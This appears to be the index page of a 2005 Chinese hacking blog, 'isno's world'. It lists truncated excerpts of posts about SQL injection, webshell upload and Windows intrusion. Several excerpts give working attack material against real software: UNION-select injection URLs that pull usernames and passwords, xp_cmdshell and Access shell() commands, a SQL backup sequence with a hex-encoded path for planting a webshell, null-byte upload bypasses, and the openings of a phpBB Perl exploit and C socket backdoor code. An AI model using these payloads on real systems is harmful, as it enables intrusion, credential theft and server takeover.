All about security

scripts.girl

导航

2005年5月12日

摘要: 如果站上放了个大文件,那就要小心了,很容易被别人DDOS,以我的影音传送带为例,现在已经是128线程了。只要线程足够大,你的站点永远无法访问。这让我想起了别的方法,比如防火墙阻挡吧,虽然LOG能记录黑客的攻击,但是当你的硬盘填满的时候,会不会还能记录LOG呢?还有一些记录SQL注入的东西,当然也是用数据库来记录的,用同样的方法,让你的数据库足够大,嘿嘿,后面的攻击就可以轻松突破了。这些当然是理论上... 阅读全文

posted @ 2005-05-12 22:01 isno's world 阅读(592) 评论(0) 推荐(0)

摘要: 老的方法我就不说了。也不实际我来说说新的吧 1 很多人没有把administrator设置密码,所以我们很容易通过administrator/""进入系统。2000 直接进去xp 按两下ctrl+alt+del就可以了2 用windows登陆密码破解器运行后装在软盘中。如果对方电脑没有软驱,我建议把自己的软驱扯下来,装到别人机器上(这样太专业了,不过没办法) 阅读全文

posted @ 2005-05-12 16:21 isno's world 阅读(1026) 评论(1) 推荐(0)

摘要: 发现一个站:www.123cha.com最近有一个查询某站的二级站点,其实就是在这里查的。里面有个“Alexa排名资料”站 Alexa 流量、访问量、页面浏览量查询  Alexa 排名是目前常引用的用来评价某一网站访问量的一个指标。事实上,Alexa 排名是根据对用户下载并安装了 Alexa Tools Bar 嵌入到 IE 等浏览器,从而监控其访问的网站数据进行统计的,因此,其排名数据并不具有绝... 阅读全文

posted @ 2005-05-12 15:51 isno's world 阅读(662) 评论(0) 推荐(0)

摘要: 今天在godexp站上看到一些被黑的站点,jp的.一看全站都是html的,而且主机上没有别的站,旁注也是不可能的而且连二级站点都没有郁闷,只有两种可能了1 ftp密码被破解2系统漏洞后来一问spirit,当时就傻了,原来是利用最新的iis5.0webdav溢出工具来的真是郁闷! 搞脚本那么久了,连基本的入侵都忘记了. 阅读全文

posted @ 2005-05-12 15:20 isno's world 阅读(602) 评论(0) 推荐(0)

摘要: #include#include #pragma comment (lib, "Ws2_32.lib")int port=1983;DWORD WINAPI ClientThread(LPVOID lpParam);void Help(){printf(" /***************************************\\\n");printf(" |This S... 阅读全文

posted @ 2005-05-12 15:16 isno's world 阅读(359) 评论(0) 推荐(0)

摘要: 前言: 说起“中间人攻击(Man-in-the-middle-attacks,简称:MITM攻击)”大家可能马上想起曾经风靡一时的SMB会话劫持,DNS欺骗等技术,这些都是典型的MITM攻击手段。其实MITM攻击说它是一种手段,不如说它是一种攻击模式,它可以应用于各个领域,比如在现实中,A通过B给C传话,那么B在传话给C的时候,可以夸大其词,也可以填油加醋后传给C,在这个过程中中间人B ... 阅读全文

posted @ 2005-05-12 15:03 isno's world 阅读(619) 评论(0) 推荐(0)

摘要: SQL Server 数据库的备份与恢复 选择操作:备份 恢复 数据库名:"> 文件路径:(备份或恢复的文件路径,备份成EXE主要为了方便下载,活活..) 0 then response.write err.number&"" response.write err.description&"" end if Response.write "备份成功!" elseif act = ... 阅读全文

posted @ 2005-05-12 15:02 isno's world 阅读(581) 评论(0) 推荐(0)

摘要: 家是温馨的 阅读全文

posted @ 2005-05-12 01:54 isno's world 阅读(486) 评论(0) 推荐(0)

摘要: 看了臭要饭写的跨库查询,我整理了一下从暴库到暴出密码等的一般 步骤,使得思路更清晰些。 SQL INJECTION 灵活多变,注入的语句不一,下面只提供暴库的一般 步骤,希望能对你有帮助。 1:暴出所有库名. http://www.***.com/***.asp?id=1 and 0(select count(*) from master.dbo.sysdatabases where... 阅读全文

posted @ 2005-05-12 01:41 isno's world 阅读(348) 评论(0) 推荐(0)

摘要: 很多站都是这样防止或是过滤ASP提交的参数的 ifisnumeric(id)Then response.write"yes!" callsql_query(id) else response.write"Errorid" Response.End endif 这样就不论怎么样,如果出现非数值就出现错误,很直接的防范,没办法出错,也没办法得到数据库类型 但是其... 阅读全文

posted @ 2005-05-12 01:40 isno's world 阅读(422) 评论(0) 推荐(0)

摘要: 来自:TNT-BSecurityTeam 这篇是我们TNT-B小组贴在dvbbs上的一篇文章! 原文见http://www.dvbbs.net/TNT-B/DVBBS.TXT可能现在已经删了!hoho 前段时间听说动网的上传再次出现了不可修复的错误,有人居然说是upload.inc有错,我仔细的读了N遍代码,可以肯定的说,upload.inc应该没有办法利用,今天无意中跑到动网的官... 阅读全文

posted @ 2005-05-12 01:40 isno's world 阅读(329) 评论(0) 推荐(0)

摘要: #!/usr/bin/perl -w use IO::Socket; ## Example: ## C:\>phpbb.pl www.site.com /phpBB2/ 2 ## ## downloads.php mod in phpBB \n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " [~... 阅读全文

posted @ 2005-05-12 01:39 isno's world 阅读(378) 评论(0) 推荐(0)

摘要: 引用:找到一点关于不要绝对路径的东西,希望讨论一下! ACCESS的跨库是通过中括号实现的,包括路径,密码设置等;跨库的前提是已经打开了一个Connection。 问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不... 阅读全文

posted @ 2005-05-12 01:38 isno's world 阅读(463) 评论(0) 推荐(0)

摘要: 适合读者:入侵爱好者、网管 前置知识:无 脚本小子:ASP注入漏洞在国内可谓是火得不能再火了,很多大站被它搞定过。绝大多数朋友都是利用工具,或者通过手工在后面加上“AND 1=1”和“AND 1=2”,再根据返回的页面内容来判断是否存在注入漏洞的,但是有另外的注入方法却被我们忽略了。 搜索型注入成功搞定跨国电子公司 文/图 勇哥儿 大家都知道,注入方式主要有数字型和字符型,但... 阅读全文

posted @ 2005-05-12 01:36 isno's world 阅读(580) 评论(0) 推荐(0)

摘要: 四两拨千斤: 关于这个问题我不想多提,反正经过了一个晚上的测试。 (我想是应该写个文章投搞了!) 就是关于“斑主评定”栏目,当然是插件。 插件比较乱,有很多,比如前台就是 z_disadmin.asp z_disadmin_edit.asp z_disadminconn.asp 后台在data/#pingding.mdb 有的后台在data/pingding.asp 有的则在data/di... 阅读全文

posted @ 2005-05-12 01:35 isno's world 阅读(277) 评论(0) 推荐(0)

摘要: 1 asp 抓包后只要对未过滤的,比如目录名、文件名后面加个空格,并在UltraEdit中将空格的hex字符修改成00 然后再将d:\hack\mm\mm.asp修改成mm.jpg就可以了。 再用nc提交 2 php 第一处只要在修改成mm.php%00 再将d:\hack\mm\mm.php修改成mm.jpg即可 再用nc提交 3 jsp 只要将包的"Content-Type: text/p... 阅读全文

posted @ 2005-05-12 01:35 isno's world 阅读(445) 评论(0) 推荐(0)

摘要: 我前段时间写了一篇《MySQL注入中导出字段内容的研究——通过注入导出WebShell》(http://www.4ngel.net/article/37.htm),是查询数据然后在生成文件的,现在我发现其实不少PHP程序,比如IPB就是把数据处理过了,再插入数据库,一般是htmlspecialchars()之后,插入数据,所以利用该文的方法,就行不通了,即使把webshell的代码插入数据库,生成... 阅读全文

posted @ 2005-05-12 01:34 isno's world 阅读(572) 评论(0) 推荐(0)

摘要: 新漏洞,对sql和access通杀 ALLyeSNo[Godkiller Team] 漏洞处在blog.asp中:如下代码 ----------------------------------------------------------------- "" then sql="select * from [calendar] where id="&id&" order by id Desc"... 阅读全文

posted @ 2005-05-12 01:33 isno's world 阅读(918) 评论(0) 推荐(0)

摘要: 今天看到一个难题: http://www.cnnb.net.cn/lake2/Challenge/challenge.asp?id=1 (呵呵,有空大家也可以去试试自己的实力) 这个本来是不想公布的,但是不写手又痒痒,所以才写这个文章,用来自勉! 大家一定要试过后,才来看我的解答! -----------------------------秘密文件--------------------... 阅读全文

posted @ 2005-05-12 01:31 isno's world 阅读(301) 评论(0) 推荐(0)

摘要: 这个漏洞实在不想说,靠这个看了不少免费电影! 现在公布一下吧: 就是re.asp里面对id参数未过滤。 这样来利用 re.asp?id=0 union select 1,1,1 from users where oklook>=5(4,3,2,1) re.asp?id=0 union select 1,userid,password from users where oklook>=5 re.a... 阅读全文

posted @ 2005-05-12 01:29 isno's world 阅读(349) 评论(0) 推荐(0)

摘要: asp木马登陆密码验证关键代码如下: if Epass(trim(request.form("password")))="q_ux624q|p" then response.cookies("password")="8811748" ... 很明显,用的是Epass函数把输入的密码进行加密,然后将得到的密文和原密文进 行比对。如果稍有点编程基础的话,特别是VB,那么Epass里的加密算... 阅读全文

posted @ 2005-05-12 01:28 isno's world 阅读(754) 评论(0) 推荐(0)

摘要: 在地址栏或按Ctrl+O,输入: javascript:s=document.documentElement.outerHTML;document.write('');document.body.innerText=s; 源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。 阅读全文

posted @ 2005-05-12 01:28 isno's world 阅读(315) 评论(0) 推荐(0)

摘要: NB-裤衩[XX] 日前SQLINJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQLSERVER数据库,正因为如此,很多人开始怀疑SQLSERVER的安全性。其实SQLSERVER2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQLSERVER还是相当的安全的。当然和ORCAL、DB2等还是有差... 阅读全文

posted @ 2005-05-12 01:26 isno's world 阅读(671) 评论(0) 推荐(0)

摘要: SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩 展存储过程是未公开的,从sql server 7.0就有了, 在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供 了在当前的SQL Server版本中访问系统注册表的能力, 而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程 .所以最好在... 阅读全文

posted @ 2005-05-12 01:26 isno's world 阅读(378) 评论(0) 推荐(0)

摘要: %5c类的 漏洞在asp不再复述 我们看看 它在asp.net下的问题 Microsoft ASP.NET vulnerability (updated Oct. 7th) Microsoft announced a possible vulnerability in ASP.NET (http://www.microsoft.com/security/incident/aspnet.... 阅读全文

posted @ 2005-05-12 01:24 isno's world 阅读(364) 评论(0) 推荐(0)

摘要: G:\test>type/? 显示文本文件的内容。 TYPE [drive:][path]filename 当然type还有其他用途 G:\test>type mm.exe>allyesno.exe G:\test>allyesno VNCrackX4 by Phenoelit (http://www.phenoelit.de/) Usage: Online: ./vncrack -h ... 阅读全文

posted @ 2005-05-12 01:24 isno's world 阅读(364) 评论(0) 推荐(0)

摘要: 数据库是电子商务、金融以及ERP系统的基础,通常都保存着重要的商业伙伴和 客户信息。大多数企业、组织以及政府部门的电子数据都保存在各种数据库中,他们 用这些数据库保存一些个人资料,还掌握着敏感的金融数据。但是数据库通常没有象 操作系统和网络这样在安全性上受到重视。数据是企业,组织的命脉所在,因此选择 一款安全的数据库是至关重要的。大型网站一般使用oracle或DB2,而中小型网站大 多数... 阅读全文

posted @ 2005-05-12 01:23 isno's world 阅读(388) 评论(0) 推荐(0)

摘要: 分析phpwind2.0.1漏洞 by猫猫&&allyesno 时间:2005年4月17日,凌晨。 猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的,我还在冒虚汗中,同时pinkeyes 的睿智深深的打动了我,原来我才明白什么才是真正的技术含量。且听我慢... 阅读全文

posted @ 2005-05-12 01:22 isno's world 阅读(291) 评论(0) 推荐(0)

摘要: 一定是暴绝对路径哦!不能暴数据库路径 可以拿出来吓吓人用的。 就是dvbbs的connad.ASP。看看怎么写的 恩,确实少了点东西 这样的话,程序在二级目录的都可以暴,看看我是怎么暴的。 按照文章的思路是这样的。 一定要是二级站点比如类似:http://wwww.target.com/bbs/ 记得有个文章提到的可以从一级站点暴库:方法是http://target.com/noexis... 阅读全文

posted @ 2005-05-12 01:21 isno's world 阅读(339) 评论(0) 推荐(0)

摘要: 海阳顶端网jsp暴源码及目录网页使用帮助: 第一个写域名;第二个写路径;第三个写文件名,注意不要加扩展名: 阅读全文

posted @ 2005-05-12 01:20 isno's world 阅读(496) 评论(0) 推荐(0)

摘要: 这个文章好象大家还是不太理解,我来做个解释。 文章的原意是:由于dvbbs7.1对备分有检测机制: ----下面代码来自dvbbs7.1中的data.asp文件------------ FileConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Dbpath Set Fileconn = Server.Cr... 阅读全文

posted @ 2005-05-12 01:19 isno's world 阅读(398) 评论(0) 推荐(0)

摘要: 文章的用意是气气 魔王的!让他知道自己的无知,本来他发表的那个漏洞是可以这样利用的: 有下面的一段代码: 使用了trim函数来去掉开头和结尾的空格,在一般的情况下,这段程序执行的很正常,但是后来竟然发现有人竟然可以使用空格来,意思就是说,该用户的name完全为空格,但是自己尝试使用空格却无论都不能通过(即被程序监测了出来),开头和结尾的空格都被trim函数给去掉了,即使中间有空格,若... 阅读全文

posted @ 2005-05-12 01:19 isno's world 阅读(299) 评论(0) 推荐(0)

摘要: 方法很简单,我们知道,一般在asp中应用文件时一般采用 两种方式,通过stm文件,是可以直接将asp文件的源代码直接输出到客户浏览器中。 要求: 1、服务器端要有shtml脚本映射 2、可以向服务器写入.stm/.shtm/.shtml后缀文件 3、知道想察看文件的文件名及相对位置 举例: 向服务器目录写入test.stm文... 阅读全文

posted @ 2005-05-12 01:17 isno's world 阅读(344) 评论(0) 推荐(0)

摘要: ----------------------------------------------------------------------------- SQL injectionがあるのは判断できるけどエラーがハンドリングされてて エラーメッセージとかから情報がひっぱれず、どうやってもUNIONで 別のSELECTが繋げられないとか、繋げられてもSELECTの直接の結果自体は 画面に表... 阅读全文

posted @ 2005-05-12 01:17 isno's world 阅读(484) 评论(0) 推荐(0)

摘要: 最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:\' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无... 阅读全文

posted @ 2005-05-12 01:16 isno's world 阅读(447) 评论(0) 推荐(0)

摘要: 本文作者:angel 文章性质:原创 发布日期:2004-09-17 声明:本文已发表在《黑客X档案》,转载请注明。 前言 记得有一些关于利用MySQL获得Shell的文章,说的是得到一个root权限,远程连接并建立一个表,在里面插入Shell的内容,然后利用intooutfile导出到相应目录,就有了一个后门。我一直没有在意,因为能对MySQL数据库直接操作的机会非常少,而且早已经掌... 阅读全文

posted @ 2005-05-12 01:14 isno's world 阅读(329) 评论(0) 推荐(0)

摘要: 1.shell的测试; 我们先在accessl里直接sql查询: 语句: SELECT shell('c:\winnt\system32\cmd.exe /c dir c:\ >c:\123456.txt'); “运行” 得到结果: C:\>dir 123456.txt 驱动器 C 中的卷没有标签。 卷的序列号是 3CEE-A8A9 C:... 阅读全文

posted @ 2005-05-12 01:13 isno's world 阅读(610) 评论(0) 推荐(0)

摘要: 利用差异备分来提高backupshell的成功率: 步骤: declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s create table [dbo].[allyesno] ([cmd] [im... 阅读全文

posted @ 2005-05-12 01:12 isno's world 阅读(339) 评论(0) 推荐(0)

摘要: 特殊方法学习黑客工具 By ivory(于厦门集美大学) 不知道别人怎么看,笔者感觉,中国人写软件很少有“开放源代码”精神。也不知道是因为怕代码写的差,拿出来丢人,还是商业目的。不管怎样,他们都已经违背了“黑客”的共享精神。好!他们不开放是他们的问题,我们也没办法,不过对于一些软件,我们还是大概能学习它是怎么运作的。不相信?这里拿出法宝“WSockExpert”。朋友们肯定会惊讶,这不... 阅读全文

posted @ 2005-05-12 01:12 isno's world 阅读(874) 评论(0) 推荐(0)

摘要: 笑看leadbbs By ivory 一提到漏洞最多的论坛程序,那肯定是非动网和bbsxp这两个莫属了。Leadbbs是个让人头疼的东西,自从上次“移花接木”大法出来后,就再也没人碰它了。我很奇怪,即使是一些所谓的“高手”,竟然碰到这种论坛就选择饶过,利用旁注其他的网站来入侵。这种做法是不对的。我们不能畏难,一个hacker要有不断探索的精神。下面我就带大家一起来剖析这个硬骨头。 我去下... 阅读全文

posted @ 2005-05-12 01:10 isno's world 阅读(568) 评论(0) 推荐(0)

摘要: 我以前很早就看到过这篇文章了,他文中提到的这种方法在某些情况下可以实现,但是这种情况比较少见。现在逐步分析每个语句的权限要求: 1. 删除存储过程: drop procedure sp_addlogin 只有在当前登录用户为master数据库的db_owner以上权限的时候才可以成功执行。 2. 创建存储过程: create procedure sp_addlogin 只有在SQL Server打... 阅读全文

posted @ 2005-05-12 01:10 isno's world 阅读(393) 评论(0) 推荐(0)

摘要: Bbsxp最新版本漏洞 By ivory 于厦门集美大学 漏洞测试:ivory&&猫猫 漏洞发现日期:2005-4-8 ... 阅读全文

posted @ 2005-05-12 01:09 isno's world 阅读(626) 评论(0) 推荐(0)